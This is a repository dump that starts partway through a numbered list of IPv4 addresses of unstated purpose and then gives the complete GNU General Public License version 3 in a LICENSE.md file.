907 | 198.200.41.86 908 | 13.114.171.179 909 | 46.37.185.231 910 | 210.51.191.73 911 | 185.98.63.132 912 | 222.255.122.168 913 | 182.61.107.182 914 | 62.220.134.49 915 | 198.200.41.93 916 | 173.212.205.148 917 | 118.244.214.182 918 | 142.4.119.65 919 | 123.207.41.72 920 | 47.91.109.31 921 | 103.16.143.166 922 | 216.92.138.42 923 | 45.32.32.182 924 | 38.117.76.26 925 | 180.150.249.88 926 | 216.131.116.73 927 | 118.193.234.27 928 | 58.138.174.221 929 | 23.225.89.186 930 | 124.131.31.232 931 | 75.103.109.192 932 | 119.27.185.22 933 | 120.77.49.163 934 | 190.0.64.37 935 | 187.188.168.201 936 | 148.100.98.159 937 | 94.23.144.45 938 | 43.230.201.89 939 | 209.141.45.250 940 | 47.52.43.233 941 | 179.43.152.36 942 | 213.197.140.90 943 | 133.186.135.73 944 | 121.41.13.126 945 | 61.90.198.151 946 | 82.146.44.65 947 | 185.5.53.187 948 | 118.70.81.17 949 | 124.128.12.164 950 | 180.168.26.98 951 | 103.75.177.80 952 | 72.52.169.165 953 | 77.87.208.19 954 | 210.209.70.68 955 | 45.76.150.21 956 | 69.64.73.168 957 | 74.91.113.153 958 | 52.36.225.72 959 | 182.16.93.43 960 | 37.48.77.108 961 | 199.182.173.14 962 | 61.191.49.185 963 | 120.27.48.56 964 | 46.105.172.243 965 | 216.92.214.26 966 | 34.217.81.143 967 | 23.244.214.50 968 | 54.67.69.230 969 | 45.61.115.52 970 | 172.247.114.9 971 | 45.79.184.204 972 | 104.203.82.163 973 | 203.174.76.207 974 | 165.225.151.116 975 | 88.81.254.77 976 | 185.29.122.103 977 | 103.48.80.245 978 | 183.157.161.173 979 | 117.48.209.107 980 | 66.128.60.254 981 | 209.239.115.167 982 | 94.130.125.29 983 | 69.36.172.238 984 | 94.138.214.194 985 | 116.7.250.58 986 | 212.24.99.148 987 | 216.92.153.65 988 | 112.74.82.159 989 | 192.81.132.162 990 | 118.193.205.195 991 | 119.29.187.189 992 | 94.23.78.243 993 | 210.248.158.36 994 | 173.245.89.203 995 | 49.212.204.170 996 | 172.246.132.229 997 | 156.234.64.159 998 | 54.191.44.174 999 | 107.180.79.156 1000 | 23.225.89.156 1001 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | 2 | GNU GENERAL PUBLIC LICENSE 3 | Version 3, 29 June 2007 4 | 5 | Copyright (C) 2007 Free Software Foundation, Inc. 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The GNU General Public License is a free, copyleft license for 12 | software and other kinds of works. 13 | 14 | The licenses for most software and other practical works are designed 15 | to take away your freedom to share and change the works. By contrast, 16 | the GNU General Public License is intended to guarantee your freedom to 17 | share and change all versions of a program--to make sure it remains free 18 | software for all its users. We, the Free Software Foundation, use the 19 | GNU General Public License for most of our software; it applies also to 20 | any other work released this way by its authors. You can apply it to 21 | your programs, too. 22 | 23 | When we speak of free software, we are referring to freedom, not 24 | price. Our General Public Licenses are designed to make sure that you 25 | have the freedom to distribute copies of free software (and charge for 26 | them if you wish), that you receive source code or can get it if you 27 | want it, that you can change the software or use pieces of it in new 28 | free programs, and that you know you can do these things. 29 | 30 | To protect your rights, we need to prevent others from denying you 31 | these rights or asking you to surrender the rights. Therefore, you have 32 | certain responsibilities if you distribute copies of the software, or if 33 | you modify it: responsibilities to respect the freedom of others. 34 | 35 | For example, if you distribute copies of such a program, whether 36 | gratis or for a fee, you must pass on to the recipients the same 37 | freedoms that you received. You must make sure that they, too, receive 38 | or can get the source code. And you must show them these terms so they 39 | know their rights. 40 | 41 | Developers that use the GNU GPL protect your rights with two steps: 42 | (1) assert copyright on the software, and (2) offer you this License 43 | giving you legal permission to copy, distribute and/or modify it. 44 | 45 | For the developers' and authors' protection, the GPL clearly explains 46 | that there is no warranty for this free software. For both users' and 47 | authors' sake, the GPL requires that modified versions be marked as 48 | changed, so that their problems will not be attributed erroneously to 49 | authors of previous versions. 50 | 51 | Some devices are designed to deny users access to install or run 52 | modified versions of the software inside them, although the manufacturer 53 | can do so. This is fundamentally incompatible with the aim of 54 | protecting users' freedom to change the software. The systematic 55 | pattern of such abuse occurs in the area of products for individuals to 56 | use, which is precisely where it is most unacceptable. Therefore, we 57 | have designed this version of the GPL to prohibit the practice for those 58 | products. If such problems arise substantially in other domains, we 59 | stand ready to extend this provision to those domains in future versions 60 | of the GPL, as needed to protect the freedom of users. 61 | 62 | Finally, every program is threatened constantly by software patents. 63 | States should not allow patents to restrict development and use of 64 | software on general-purpose computers, but in those that do, we wish to 65 | avoid the special danger that patents applied to a free program could 66 | make it effectively proprietary. To prevent this, the GPL assures that 67 | patents cannot be used to render the program non-free. 68 | 69 | The precise terms and conditions for copying, distribution and 70 | modification follow. 71 | 72 | TERMS AND CONDITIONS 73 | 74 | 0. Definitions. 75 | 76 | "This License" refers to version 3 of the GNU General Public License. 77 | 78 | "Copyright" also means copyright-like laws that apply to other kinds of 79 | works, such as semiconductor masks. 80 | 81 | "The Program" refers to any copyrightable work licensed under this 82 | License. Each licensee is addressed as "you". "Licensees" and 83 | "recipients" may be individuals or organizations. 84 | 85 | To "modify" a work means to copy from or adapt all or part of the work 86 | in a fashion requiring copyright permission, other than the making of an 87 | exact copy. The resulting work is called a "modified version" of the 88 | earlier work or a work "based on" the earlier work. 89 | 90 | A "covered work" means either the unmodified Program or a work based 91 | on the Program. 92 | 93 | To "propagate" a work means to do anything with it that, without 94 | permission, would make you directly or secondarily liable for 95 | infringement under applicable copyright law, except executing it on a 96 | computer or modifying a private copy. Propagation includes copying, 97 | distribution (with or without modification), making available to the 98 | public, and in some countries other activities as well. 99 | 100 | To "convey" a work means any kind of propagation that enables other 101 | parties to make or receive copies. Mere interaction with a user through 102 | a computer network, with no transfer of a copy, is not conveying. 103 | 104 | An interactive user interface displays "Appropriate Legal Notices" 105 | to the extent that it includes a convenient and prominently visible 106 | feature that (1) displays an appropriate copyright notice, and (2) 107 | tells the user that there is no warranty for the work (except to the 108 | extent that warranties are provided), that licensees may convey the 109 | work under this License, and how to view a copy of this License. If 110 | the interface presents a list of user commands or options, such as a 111 | menu, a prominent item in the list meets this criterion. 112 | 113 | 1. Source Code. 114 | 115 | The "source code" for a work means the preferred form of the work 116 | for making modifications to it. "Object code" means any non-source 117 | form of a work. 118 | 119 | A "Standard Interface" means an interface that either is an official 120 | standard defined by a recognized standards body, or, in the case of 121 | interfaces specified for a particular programming language, one that 122 | is widely used among developers working in that language. 123 | 124 | The "System Libraries" of an executable work include anything, other 125 | than the work as a whole, that (a) is included in the normal form of 126 | packaging a Major Component, but which is not part of that Major 127 | Component, and (b) serves only to enable use of the work with that 128 | Major Component, or to implement a Standard Interface for which an 129 | implementation is available to the public in source code form. A 130 | "Major Component", in this context, means a major essential component 131 | (kernel, window system, and so on) of the specific operating system 132 | (if any) on which the executable work runs, or a compiler used to 133 | produce the work, or an object code interpreter used to run it. 134 | 135 | The "Corresponding Source" for a work in object code form means all 136 | the source code needed to generate, install, and (for an executable 137 | work) run the object code and to modify the work, including scripts to 138 | control those activities. However, it does not include the work's 139 | System Libraries, or general-purpose tools or generally available free 140 | programs which are used unmodified in performing those activities but 141 | which are not part of the work. For example, Corresponding Source 142 | includes interface definition files associated with source files for 143 | the work, and the source code for shared libraries and dynamically 144 | linked subprograms that the work is specifically designed to require, 145 | such as by intimate data communication or control flow between those 146 | subprograms and other parts of the work. 147 | 148 | The Corresponding Source need not include anything that users 149 | can regenerate automatically from other parts of the Corresponding 150 | Source. 151 | 152 | The Corresponding Source for a work in source code form is that 153 | same work. 154 | 155 | 2. Basic Permissions. 156 | 157 | All rights granted under this License are granted for the term of 158 | copyright on the Program, and are irrevocable provided the stated 159 | conditions are met. This License explicitly affirms your unlimited 160 | permission to run the unmodified Program. The output from running a 161 | covered work is covered by this License only if the output, given its 162 | content, constitutes a covered work. This License acknowledges your 163 | rights of fair use or other equivalent, as provided by copyright law. 164 | 165 | You may make, run and propagate covered works that you do not 166 | convey, without conditions so long as your license otherwise remains 167 | in force. You may convey covered works to others for the sole purpose 168 | of having them make modifications exclusively for you, or provide you 169 | with facilities for running those works, provided that you comply with 170 | the terms of this License in conveying all material for which you do 171 | not control copyright. Those thus making or running the covered works 172 | for you must do so exclusively on your behalf, under your direction 173 | and control, on terms that prohibit them from making any copies of 174 | your copyrighted material outside their relationship with you. 175 | 176 | Conveying under any other circumstances is permitted solely under 177 | the conditions stated below. Sublicensing is not allowed; section 10 178 | makes it unnecessary. 179 | 180 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 181 | 182 | No covered work shall be deemed part of an effective technological 183 | measure under any applicable law fulfilling obligations under article 184 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 185 | similar laws prohibiting or restricting circumvention of such 186 | measures. 187 | 188 | When you convey a covered work, you waive any legal power to forbid 189 | circumvention of technological measures to the extent such circumvention 190 | is effected by exercising rights under this License with respect to 191 | the covered work, and you disclaim any intention to limit operation or 192 | modification of the work as a means of enforcing, against the work's 193 | users, your or third parties' legal rights to forbid circumvention of 194 | technological measures. 195 | 196 | 4. Conveying Verbatim Copies. 197 | 198 | You may convey verbatim copies of the Program's source code as you 199 | receive it, in any medium, provided that you conspicuously and 200 | appropriately publish on each copy an appropriate copyright notice; 201 | keep intact all notices stating that this License and any 202 | non-permissive terms added in accord with section 7 apply to the code; 203 | keep intact all notices of the absence of any warranty; and give all 204 | recipients a copy of this License along with the Program. 205 | 206 | You may charge any price or no price for each copy that you convey, 207 | and you may offer support or warranty protection for a fee. 208 | 209 | 5. Conveying Modified Source Versions. 210 | 211 | You may convey a work based on the Program, or the modifications to 212 | produce it from the Program, in the form of source code under the 213 | terms of section 4, provided that you also meet all of these conditions: 214 | 215 | a) The work must carry prominent notices stating that you modified 216 | it, and giving a relevant date. 217 | 218 | b) The work must carry prominent notices stating that it is 219 | released under this License and any conditions added under section 220 | 7. This requirement modifies the requirement in section 4 to 221 | "keep intact all notices". 222 | 223 | c) You must license the entire work, as a whole, under this 224 | License to anyone who comes into possession of a copy. This 225 | License will therefore apply, along with any applicable section 7 226 | additional terms, to the whole of the work, and all its parts, 227 | regardless of how they are packaged. This License gives no 228 | permission to license the work in any other way, but it does not 229 | invalidate such permission if you have separately received it. 230 | 231 | d) If the work has interactive user interfaces, each must display 232 | Appropriate Legal Notices; however, if the Program has interactive 233 | interfaces that do not display Appropriate Legal Notices, your 234 | work need not make them do so. 235 | 236 | A compilation of a covered work with other separate and independent 237 | works, which are not by their nature extensions of the covered work, 238 | and which are not combined with it such as to form a larger program, 239 | in or on a volume of a storage or distribution medium, is called an 240 | "aggregate" if the compilation and its resulting copyright are not 241 | used to limit the access or legal rights of the compilation's users 242 | beyond what the individual works permit. Inclusion of a covered work 243 | in an aggregate does not cause this License to apply to the other 244 | parts of the aggregate. 245 | 246 | 6. Conveying Non-Source Forms. 247 | 248 | You may convey a covered work in object code form under the terms 249 | of sections 4 and 5, provided that you also convey the 250 | machine-readable Corresponding Source under the terms of this License, 251 | in one of these ways: 252 | 253 | a) Convey the object code in, or embodied in, a physical product 254 | (including a physical distribution medium), accompanied by the 255 | Corresponding Source fixed on a durable physical medium 256 | customarily used for software interchange. 257 | 258 | b) Convey the object code in, or embodied in, a physical product 259 | (including a physical distribution medium), accompanied by a 260 | written offer, valid for at least three years and valid for as 261 | long as you offer spare parts or customer support for that product 262 | model, to give anyone who possesses the object code either (1) a 263 | copy of the Corresponding Source for all the software in the 264 | product that is covered by this License, on a durable physical 265 | medium customarily used for software interchange, for a price no 266 | more than your reasonable cost of physically performing this 267 | conveying of source, or (2) access to copy the 268 | Corresponding Source from a network server at no charge. 269 | 270 | c) Convey individual copies of the object code with a copy of the 271 | written offer to provide the Corresponding Source. This 272 | alternative is allowed only occasionally and noncommercially, and 273 | only if you received the object code with such an offer, in accord 274 | with subsection 6b. 275 | 276 | d) Convey the object code by offering access from a designated 277 | place (gratis or for a charge), and offer equivalent access to the 278 | Corresponding Source in the same way through the same place at no 279 | further charge. You need not require recipients to copy the 280 | Corresponding Source along with the object code. If the place to 281 | copy the object code is a network server, the Corresponding Source 282 | may be on a different server (operated by you or a third party) 283 | that supports equivalent copying facilities, provided you maintain 284 | clear directions next to the object code saying where to find the 285 | Corresponding Source. Regardless of what server hosts the 286 | Corresponding Source, you remain obligated to ensure that it is 287 | available for as long as needed to satisfy these requirements. 288 | 289 | e) Convey the object code using peer-to-peer transmission, provided 290 | you inform other peers where the object code and Corresponding 291 | Source of the work are being offered to the general public at no 292 | charge under subsection 6d. 293 | 294 | A separable portion of the object code, whose source code is excluded 295 | from the Corresponding Source as a System Library, need not be 296 | included in conveying the object code work. 297 | 298 | A "User Product" is either (1) a "consumer product", which means any 299 | tangible personal property which is normally used for personal, family, 300 | or household purposes, or (2) anything designed or sold for incorporation 301 | into a dwelling. In determining whether a product is a consumer product, 302 | doubtful cases shall be resolved in favor of coverage. For a particular 303 | product received by a particular user, "normally used" refers to a 304 | typical or common use of that class of product, regardless of the status 305 | of the particular user or of the way in which the particular user 306 | actually uses, or expects or is expected to use, the product. A product 307 | is a consumer product regardless of whether the product has substantial 308 | commercial, industrial or non-consumer uses, unless such uses represent 309 | the only significant mode of use of the product. 310 | 311 | "Installation Information" for a User Product means any methods, 312 | procedures, authorization keys, or other information required to install 313 | and execute modified versions of a covered work in that User Product from 314 | a modified version of its Corresponding Source. The information must 315 | suffice to ensure that the continued functioning of the modified object 316 | code is in no case prevented or interfered with solely because 317 | modification has been made. 318 | 319 | If you convey an object code work under this section in, or with, or 320 | specifically for use in, a User Product, and the conveying occurs as 321 | part of a transaction in which the right of possession and use of the 322 | User Product is transferred to the recipient in perpetuity or for a 323 | fixed term (regardless of how the transaction is characterized), the 324 | Corresponding Source conveyed under this section must be accompanied 325 | by the Installation Information. But this requirement does not apply 326 | if neither you nor any third party retains the ability to install 327 | modified object code on the User Product (for example, the work has 328 | been installed in ROM). 329 | 330 | The requirement to provide Installation Information does not include a 331 | requirement to continue to provide support service, warranty, or updates 332 | for a work that has been modified or installed by the recipient, or for 333 | the User Product in which it has been modified or installed. Access to a 334 | network may be denied when the modification itself materially and 335 | adversely affects the operation of the network or violates the rules and 336 | protocols for communication across the network. 337 | 338 | Corresponding Source conveyed, and Installation Information provided, 339 | in accord with this section must be in a format that is publicly 340 | documented (and with an implementation available to the public in 341 | source code form), and must require no special password or key for 342 | unpacking, reading or copying. 343 | 344 | 7. Additional Terms. 345 | 346 | "Additional permissions" are terms that supplement the terms of this 347 | License by making exceptions from one or more of its conditions. 348 | Additional permissions that are applicable to the entire Program shall 349 | be treated as though they were included in this License, to the extent 350 | that they are valid under applicable law. If additional permissions 351 | apply only to part of the Program, that part may be used separately 352 | under those permissions, but the entire Program remains governed by 353 | this License without regard to the additional permissions. 354 | 355 | When you convey a copy of a covered work, you may at your option 356 | remove any additional permissions from that copy, or from any part of 357 | it. (Additional permissions may be written to require their own 358 | removal in certain cases when you modify the work.) You may place 359 | additional permissions on material, added by you to a covered work, 360 | for which you have or can give appropriate copyright permission. 361 | 362 | Notwithstanding any other provision of this License, for material you 363 | add to a covered work, you may (if authorized by the copyright holders of 364 | that material) supplement the terms of this License with terms: 365 | 366 | a) Disclaiming warranty or limiting liability differently from the 367 | terms of sections 15 and 16 of this License; or 368 | 369 | b) Requiring preservation of specified reasonable legal notices or 370 | author attributions in that material or in the Appropriate Legal 371 | Notices displayed by works containing it; or 372 | 373 | c) Prohibiting misrepresentation of the origin of that material, or 374 | requiring that modified versions of such material be marked in 375 | reasonable ways as different from the original version; or 376 | 377 | d) Limiting the use for publicity purposes of names of licensors or 378 | authors of the material; or 379 | 380 | e) Declining to grant rights under trademark law for use of some 381 | trade names, trademarks, or service marks; or 382 | 383 | f) Requiring indemnification of licensors and authors of that 384 | material by anyone who conveys the material (or modified versions of 385 | it) with contractual assumptions of liability to the recipient, for 386 | any liability that these contractual assumptions directly impose on 387 | those licensors and authors. 388 | 389 | All other non-permissive additional terms are considered "further 390 | restrictions" within the meaning of section 10. If the Program as you 391 | received it, or any part of it, contains a notice stating that it is 392 | governed by this License along with a term that is a further 393 | restriction, you may remove that term. If a license document contains 394 | a further restriction but permits relicensing or conveying under this 395 | License, you may add to a covered work material governed by the terms 396 | of that license document, provided that the further restriction does 397 | not survive such relicensing or conveying. 398 | 399 | If you add terms to a covered work in accord with this section, you 400 | must place, in the relevant source files, a statement of the 401 | additional terms that apply to those files, or a notice indicating 402 | where to find the applicable terms. 403 | 404 | Additional terms, permissive or non-permissive, may be stated in the 405 | form of a separately written license, or stated as exceptions; 406 | the above requirements apply either way. 407 | 408 | 8. Termination. 409 | 410 | You may not propagate or modify a covered work except as expressly 411 | provided under this License. Any attempt otherwise to propagate or 412 | modify it is void, and will automatically terminate your rights under 413 | this License (including any patent licenses granted under the third 414 | paragraph of section 11). 415 | 416 | However, if you cease all violation of this License, then your 417 | license from a particular copyright holder is reinstated (a) 418 | provisionally, unless and until the copyright holder explicitly and 419 | finally terminates your license, and (b) permanently, if the copyright 420 | holder fails to notify you of the violation by some reasonable means 421 | prior to 60 days after the cessation. 422 | 423 | Moreover, your license from a particular copyright holder is 424 | reinstated permanently if the copyright holder notifies you of the 425 | violation by some reasonable means, this is the first time you have 426 | received notice of violation of this License (for any work) from that 427 | copyright holder, and you cure the violation prior to 30 days after 428 | your receipt of the notice. 429 | 430 | Termination of your rights under this section does not terminate the 431 | licenses of parties who have received copies or rights from you under 432 | this License. If your rights have been terminated and not permanently 433 | reinstated, you do not qualify to receive new licenses for the same 434 | material under section 10. 435 | 436 | 9. Acceptance Not Required for Having Copies. 437 | 438 | You are not required to accept this License in order to receive or 439 | run a copy of the Program. Ancillary propagation of a covered work 440 | occurring solely as a consequence of using peer-to-peer transmission 441 | to receive a copy likewise does not require acceptance. However, 442 | nothing other than this License grants you permission to propagate or 443 | modify any covered work. These actions infringe copyright if you do 444 | not accept this License. Therefore, by modifying or propagating a 445 | covered work, you indicate your acceptance of this License to do so. 446 | 447 | 10. Automatic Licensing of Downstream Recipients. 448 | 449 | Each time you convey a covered work, the recipient automatically 450 | receives a license from the original licensors, to run, modify and 451 | propagate that work, subject to this License. You are not responsible 452 | for enforcing compliance by third parties with this License. 453 | 454 | An "entity transaction" is a transaction transferring control of an 455 | organization, or substantially all assets of one, or subdividing an 456 | organization, or merging organizations. If propagation of a covered 457 | work results from an entity transaction, each party to that 458 | transaction who receives a copy of the work also receives whatever 459 | licenses to the work the party's predecessor in interest had or could 460 | give under the previous paragraph, plus a right to possession of the 461 | Corresponding Source of the work from the predecessor in interest, if 462 | the predecessor has it or can get it with reasonable efforts. 463 | 464 | You may not impose any further restrictions on the exercise of the 465 | rights granted or affirmed under this License. For example, you may 466 | not impose a license fee, royalty, or other charge for exercise of 467 | rights granted under this License, and you may not initiate litigation 468 | (including a cross-claim or counterclaim in a lawsuit) alleging that 469 | any patent claim is infringed by making, using, selling, offering for 470 | sale, or importing the Program or any portion of it. 471 | 472 | 11. Patents. 473 | 474 | A "contributor" is a copyright holder who authorizes use under this 475 | License of the Program or a work on which the Program is based. The 476 | work thus licensed is called the contributor's "contributor version". 477 | 478 | A contributor's "essential patent claims" are all patent claims 479 | owned or controlled by the contributor, whether already acquired or 480 | hereafter acquired, that would be infringed by some manner, permitted 481 | by this License, of making, using, or selling its contributor version, 482 | but do not include claims that would be infringed only as a 483 | consequence of further modification of the contributor version. For 484 | purposes of this definition, "control" includes the right to grant 485 | patent sublicenses in a manner consistent with the requirements of 486 | this License. 487 | 488 | Each contributor grants you a non-exclusive, worldwide, royalty-free 489 | patent license under the contributor's essential patent claims, to 490 | make, use, sell, offer for sale, import and otherwise run, modify and 491 | propagate the contents of its contributor version. 492 | 493 | In the following three paragraphs, a "patent license" is any express 494 | agreement or commitment, however denominated, not to enforce a patent 495 | (such as an express permission to practice a patent or covenant not to 496 | sue for patent infringement). To "grant" such a patent license to a 497 | party means to make such an agreement or commitment not to enforce a 498 | patent against the party. 499 | 500 | If you convey a covered work, knowingly relying on a patent license, 501 | and the Corresponding Source of the work is not available for anyone 502 | to copy, free of charge and under the terms of this License, through a 503 | publicly available network server or other readily accessible means, 504 | then you must either (1) cause the Corresponding Source to be so 505 | available, or (2) arrange to deprive yourself of the benefit of the 506 | patent license for this particular work, or (3) arrange, in a manner 507 | consistent with the requirements of this License, to extend the patent 508 | license to downstream recipients. "Knowingly relying" means you have 509 | actual knowledge that, but for the patent license, your conveying the 510 | covered work in a country, or your recipient's use of the covered work 511 | in a country, would infringe one or more identifiable patents in that 512 | country that you have reason to believe are valid. 513 | 514 | If, pursuant to or in connection with a single transaction or 515 | arrangement, you convey, or propagate by procuring conveyance of, a 516 | covered work, and grant a patent license to some of the parties 517 | receiving the covered work authorizing them to use, propagate, modify 518 | or convey a specific copy of the covered work, then the patent license 519 | you grant is automatically extended to all recipients of the covered 520 | work and works based on it. 521 | 522 | A patent license is "discriminatory" if it does not include within 523 | the scope of its coverage, prohibits the exercise of, or is 524 | conditioned on the non-exercise of one or more of the rights that are 525 | specifically granted under this License. You may not convey a covered 526 | work if you are a party to an arrangement with a third party that is 527 | in the business of distributing software, under which you make payment 528 | to the third party based on the extent of your activity of conveying 529 | the work, and under which the third party grants, to any of the 530 | parties who would receive the covered work from you, a discriminatory 531 | patent license (a) in connection with copies of the covered work 532 | conveyed by you (or copies made from those copies), or (b) primarily 533 | for and in connection with specific products or compilations that 534 | contain the covered work, unless you entered into that arrangement, 535 | or that patent license was granted, prior to 28 March 2007. 536 | 537 | Nothing in this License shall be construed as excluding or limiting 538 | any implied license or other defenses to infringement that may 539 | otherwise be available to you under applicable patent law. 540 | 541 | 12. No Surrender of Others' Freedom. 542 | 543 | If conditions are imposed on you (whether by court order, agreement or 544 | otherwise) that contradict the conditions of this License, they do not 545 | excuse you from the conditions of this License. If you cannot convey a 546 | covered work so as to satisfy simultaneously your obligations under this 547 | License and any other pertinent obligations, then as a consequence you may 548 | not convey it at all. For example, if you agree to terms that obligate you 549 | to collect a royalty for further conveying from those to whom you convey 550 | the Program, the only way you could satisfy both those terms and this 551 | License would be to refrain entirely from conveying the Program. 552 | 553 | 13. Use with the GNU Affero General Public License. 554 | 555 | Notwithstanding any other provision of this License, you have 556 | permission to link or combine any covered work with a work licensed 557 | under version 3 of the GNU Affero General Public License into a single 558 | combined work, and to convey the resulting work. The terms of this 559 | License will continue to apply to the part which is the covered work, 560 | but the special requirements of the GNU Affero General Public License, 561 | section 13, concerning interaction through a network will apply to the 562 | combination as such. 563 | 564 | 14. Revised Versions of this License. 565 | 566 | The Free Software Foundation may publish revised and/or new versions of 567 | the GNU General Public License from time to time. Such new versions will 568 | be similar in spirit to the present version, but may differ in detail to 569 | address new problems or concerns. 570 | 571 | Each version is given a distinguishing version number. If the 572 | Program specifies that a certain numbered version of the GNU General 573 | Public License "or any later version" applies to it, you have the 574 | option of following the terms and conditions either of that numbered 575 | version or of any later version published by the Free Software 576 | Foundation. If the Program does not specify a version number of the 577 | GNU General Public License, you may choose any version ever published 578 | by the Free Software Foundation. 579 | 580 | If the Program specifies that a proxy can decide which future 581 | versions of the GNU General Public License can be used, that proxy's 582 | public statement of acceptance of a version permanently authorizes you 583 | to choose that version for the Program. 584 | 585 | Later license versions may give you additional or different 586 | permissions. However, no additional obligations are imposed on any 587 | author or copyright holder as a result of your choosing to follow a 588 | later version. 589 | 590 | 15. Disclaimer of Warranty. 591 | 592 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 593 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 594 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 595 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 596 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 597 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 598 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 599 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 600 | 601 | 16. Limitation of Liability. 602 | 603 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 604 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 605 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 606 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 607 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 608 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 609 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 610 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 611 | SUCH DAMAGES. 612 | 613 | 17. Interpretation of Sections 15 and 16. 614 | 615 | If the disclaimer of warranty and limitation of liability provided 616 | above cannot be given local legal effect according to their terms, 617 | reviewing courts shall apply local law that most closely approximates 618 | an absolute waiver of all civil liability in connection with the 619 | Program, unless a warranty or assumption of liability accompanies a 620 | copy of the Program in return for a fee. 621 | 622 | END OF TERMS AND CONDITIONS 623 | 624 | How to Apply These Terms to Your New Programs 625 | 626 | If you develop a new program, and you want it to be of the greatest 627 | possible use to the public, the best way to achieve this is to make it 628 | free software which everyone can redistribute and change under these terms. 629 | 630 | To do so, attach the following notices to the program. It is safest 631 | to attach them to the start of each source file to most effectively 632 | state the exclusion of warranty; and each file should have at least 633 | the "copyright" line and a pointer to where the full notice is found. 634 | 635 | 636 | Copyright (C) 637 | 638 | This program is free software: you can redistribute it and/or modify 639 | it under the terms of the GNU General Public License as published by 640 | the Free Software Foundation, either version 3 of the License, or 641 | (at your option) any later version. 642 | 643 | This program is distributed in the hope that it will be useful, 644 | but WITHOUT ANY WARRANTY; without even the implied warranty of 645 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 646 | GNU General Public License for more details. 647 | 648 | You should have received a copy of the GNU General Public License 649 | along with this program. If not, see . 650 | 651 | Also add information on how to contact you by electronic and paper mail. 652 | 653 | If the program does terminal interaction, make it output a short 654 | notice like this when it starts in an interactive mode: 655 | 656 | {project} Copyright (C) {year} {fullname} 657 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 658 | This is free software, and you are welcome to redistribute it 659 | under certain conditions; type `show c' for details. 660 | 661 | The hypothetical commands `show w' and `show c' should show the appropriate 662 | parts of the General Public License. Of course, your program's commands 663 | might be different; for a GUI interface, you would use an "about box". 664 | 665 | You should also get your employer (if you work as a programmer) or school, 666 | if any, to sign a "copyright disclaimer" for the program, if necessary. 667 | For more information on this, and how to apply and follow the GNU GPL, see 668 | . 669 | 670 | The GNU General Public License does not permit incorporating your program 671 | into proprietary programs. If your program is a subroutine library, you 672 | may consider it more useful to permit linking proprietary applications with 673 | the library. If this is what you want to do, use the GNU Lesser General 674 | Public License instead of this License. But first, please read 675 | . 676 | --------------------------------------------------------------------------------